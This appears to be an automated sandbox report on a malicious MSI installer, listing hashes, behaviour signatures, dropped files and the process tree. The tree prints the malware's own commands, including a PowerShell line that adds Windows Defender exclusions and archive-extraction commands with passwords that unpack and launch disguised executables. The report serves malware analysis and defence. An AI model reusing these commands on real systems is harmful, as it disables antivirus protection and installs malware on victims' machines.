Analysis

  • max time kernel
    139s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    19-11-2024 08:40

General

  • Target

    4037df6c0b60bb7d411ba6f760843830bcb80483713e6eb91db5b9c8b9f0711d.msi

  • Size

    27.1MB

  • MD5

    756b1b81669fb5b5d745c83ced428cb1

  • SHA1

    c573e1f1d32780c808db53e5fd5e571d617816e6

  • SHA256

    4037df6c0b60bb7d411ba6f760843830bcb80483713e6eb91db5b9c8b9f0711d

  • SHA512

    d9fd646383ff4fa82a920068b2141a94bd10424c5465040066d28be78be83ad730915b50bf1dfea9c2ed03b4a6b2287a19078a235a78aa835148a0381f5b00da

  • SSDEEP

    786432:G3OL1MXJ/fZz/yft39ldEQk9EzbR8VP0wiVD8Kyt:iOL1MXJ3Zz/etDdEQfHm10LU

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 17 IoCs
  • Drops file in Windows directory 10 IoCs
  • Executes dropped EXE 4 IoCs
  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 48 IoCs
  • Modifies registry class 22 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 53 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\4037df6c0b60bb7d411ba6f760843830bcb80483713e6eb91db5b9c8b9f0711d.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2440
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1964
    • C:\Windows\system32\MsiExec.exe
      C:\Windows\system32\MsiExec.exe -Embedding 56B252D9CF853C7DDBDBC70503BA860F M Global\MSI0000
      2⤵
      • Drops file in Program Files directory
      • Suspicious use of WriteProcessMemory
      PID:1452
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\CPUAimLinux','C:\Program Files','C:\Program Files'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:580
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c start /min "" "C:\Program Files\CPUAimLinux\fXlHSNCgjpwhjcbESorcUuElETFupI.exe" x "C:\Program Files\CPUAimLinux\sCoWxepalfWCObCLKnAyaHfPkmbWUL" -o"C:\Program Files\CPUAimLinux\" -p"08136{%Qmb0Mr~q{WXZU" -y & ping 127.0.0.1 -n 2 & start /min "" "C:\Program Files\CPUAimLinux\fXlHSNCgjpwhjcbESorcUuElETFupI.exe" x "C:\Program Files\CPUAimLinux\cuwtzNKpgpoaOTjpwbTJlaaZdnfuAX" -x!"1_hHILqDIvDmMm.exe" -x!"sss" -x!"1_bEUAxCisQyQxhNlIqgtfrSfaocnxud.exe" -x!"1_" -x!"1_" -x!"sa" -o"C:\Program Files\CPUAimLinux\" -p"86225)AYVohjF3DD0{k[" -y
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:2336
        • C:\Program Files\CPUAimLinux\fXlHSNCgjpwhjcbESorcUuElETFupI.exe
          "C:\Program Files\CPUAimLinux\fXlHSNCgjpwhjcbESorcUuElETFupI.exe" x "C:\Program Files\CPUAimLinux\sCoWxepalfWCObCLKnAyaHfPkmbWUL" -o"C:\Program Files\CPUAimLinux\" -p"08136{%Qmb0Mr~q{WXZU" -y
          4⤵
          • Drops file in Program Files directory
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          • Suspicious use of AdjustPrivilegeToken
          PID:796
        • C:\Windows\system32\PING.EXE
          ping 127.0.0.1 -n 2
          4⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:808
        • C:\Program Files\CPUAimLinux\fXlHSNCgjpwhjcbESorcUuElETFupI.exe
          "C:\Program Files\CPUAimLinux\fXlHSNCgjpwhjcbESorcUuElETFupI.exe" x "C:\Program Files\CPUAimLinux\cuwtzNKpgpoaOTjpwbTJlaaZdnfuAX" -x!"1_hHILqDIvDmMm.exe" -x!"sss" -x!"1_bEUAxCisQyQxhNlIqgtfrSfaocnxud.exe" -x!"1_" -x!"1_" -x!"sa" -o"C:\Program Files\CPUAimLinux\" -p"86225)AYVohjF3DD0{k[" -y
          4⤵
          • Drops file in Program Files directory
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          • Suspicious use of AdjustPrivilegeToken
          PID:2128
      • C:\Program Files\CPUAimLinux\hHILqDIvDmMm.exe
        "C:\Program Files\CPUAimLinux\hHILqDIvDmMm.exe" -number 169 -file file3 -mode mode3
        3⤵
        • Drops file in Program Files directory
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2636
      • C:\Program Files\CPUAimLinux\WhatsApp1.exe
        "C:\Program Files\CPUAimLinux\WhatsApp1.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1512
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 1512 -s 632
          4⤵
            PID:1356
        • C:\Windows\System32\taskkill.exe
          "C:\Windows\System32\taskkill.exe" /F /IM msiexec.exe
          3⤵
          • Kills process with taskkill
          PID:1800
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:880
    • C:\Windows\system32\DrvInst.exe
      DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000005DC" "00000000000005A4"
      1⤵
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious use of AdjustPrivilegeToken
      PID:2732
    • C:\Windows\system32\msiexec.exe
      C:\Windows\system32\msiexec.exe /V
      1⤵
        PID:2092

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Config.Msi\f76d589.rbs

        Filesize

        7KB

        MD5

        fe2040449600ff19d25aa62cc1c51104

        SHA1

        b32b83378744727730180a52f6904c3ff001ce16

        SHA256

        eb688de283a2318e5167e1e10a22105e22161a8b22b197d5ab57a7ef82b3d75b

        SHA512

        a045ab5432d10c9e67cbdb874fa72e3dbb44e73ac3e63b2edc35766e6038f65741d519f7a949cc9757d29e569450bd5e41b18a4a2c3db0b8ac27b5f8844473ad

      • C:\Program Files\CPUAimLinux\2_hHILqDIvDmMm.exe

        Filesize

        3.1MB

        MD5

        db6688b70f3255877e15541970145e68

        SHA1

        5f69edadeb9e7dae7f4b034031cb325ce1c7f2bd

        SHA256

        208f1f3a5928a4b6ea18e91bbbd33ad8d04273f067983e8e09490b1b8a12f7cb

        SHA512

        72f588728035f844662381e928ed117134ce2bae1be1848204fc1bd753f37fbdfd4a683ff1454ef944643a51c2fe9944a651b2847428f8d15a1c6c026e0ecfce

      • C:\Program Files\CPUAimLinux\WhatsApp1.exe

        Filesize

        1.0MB

        MD5

        f90ddf18d65bb3153bcdfdc4856ce2a5

        SHA1

        611376391f17207d60ca8c2ec81354933f8dac45

        SHA256

        62eef5a5e363624007bc29a6ecd3275aec2e5a67eef058df404d145c90e3a0ce

        SHA512

        f3f20f216ab6fd055f8d494f2758512413cb1cf121a2b51cae4e7b371a595b4dfe8ed4213aa759ccc4569ad6ed792f936304bfb4aac2952a79a3b2bccd293316

      • C:\Program Files\CPUAimLinux\cuwtzNKpgpoaOTjpwbTJlaaZdnfuAX

        Filesize

        2.4MB

        MD5

        1b772652a5b64c119b00ec06c00311db

        SHA1

        afeb3bfba34eccadce4d2141d6d59707c83e9583

        SHA256

        c98f9a50e0240455ce52e01d4b4e94453438a5a5614c2d424bb485ce1db8fbd4

        SHA512

        5cb2761839634a45c4047cbbe31fc30bf140829630d57104fc27fc770a68b2c7d8209181aba17ace9fe85a3f7b705467c14b2ddbc206aca3c3fd542e666f7882

      • C:\Program Files\CPUAimLinux\fXlHSNCgjpwhjcbESorcUuElETFupI.exe

        Filesize

        577KB

        MD5

        c31c4b04558396c6fabab64dcf366534

        SHA1

        fa836d92edc577d6a17ded47641ba1938589b09a

        SHA256

        9d182f421381429fd77598feb609fefb54dcaef722ddbf5aa611b68a706c10d3

        SHA512

        814dcbc1d43bc037dadc2f3f67856dd790b15fc1b0c50fa74a169c8cc02cdc79d44f1f10e200ef662eee20cd6b5ca646ec4e77673e3fe3cb7dfb7649243f6e99

      • C:\Program Files\CPUAimLinux\sCoWxepalfWCObCLKnAyaHfPkmbWUL

        Filesize

        2.4MB

        MD5

        048cee96f68a4c516b3aa1a8a4781e46

        SHA1

        5582bb564630c5ead8704d06bcdb427dd9840de5

        SHA256

        835e566ab875a5dd955882f57ea01cb2dcc5a82755821a6e951d6eb5a4005293

        SHA512

        2bf13570a5c83b4912ed04759c082a24ba8e53ce0dfae74d80032c075f7a1bc55e47c29014bd71332ff87b5c1f2065259b4b24c285bcddc109263204a0f57c32

      • memory/580-17-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

        Filesize

        2.9MB

      • memory/580-18-0x0000000002850000-0x0000000002858000-memory.dmp

        Filesize

        32KB

      • memory/1452-12-0x0000000000180000-0x0000000000190000-memory.dmp

        Filesize

        64KB

      • memory/1512-57-0x0000000001140000-0x0000000001242000-memory.dmp

        Filesize

        1.0MB

      • memory/2636-54-0x000000002B240000-0x000000002B26F000-memory.dmp

        Filesize

        188KB